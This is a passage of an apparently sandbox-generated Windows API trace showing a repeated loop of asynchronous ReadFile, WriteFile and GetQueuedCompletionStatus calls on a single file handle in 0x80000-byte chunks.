lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.372] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.374] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.375] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.375] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.399] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.401] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.402] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.402] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.412] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.413] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.414] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.415] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.433] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.434] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.435] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.435] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.437] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.438] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.440] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.440] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.466] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.468] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.469] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.469] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.471] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.472] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.473] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.473] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.484] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.485] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.487] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.487] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.488] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.490] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.491] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.491] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.501] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.502] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.503] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.503] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.505] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.506] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.508] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.508] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.532] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.533] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.535] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.535] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.536] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.538] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.539] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.539] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.549] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.550] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.552] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.552] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.567] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.569] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.571] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.571] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.590] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.591] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.592] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.593] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.603] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.605] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.606] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.606] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.627] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.628] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.629] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.629] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.631] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.633] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.634] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.635] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.644] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.646] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.647] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.652] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.653] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.653] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.663] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.664] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.683] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.691] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.701] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.703] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.705] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.705] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, 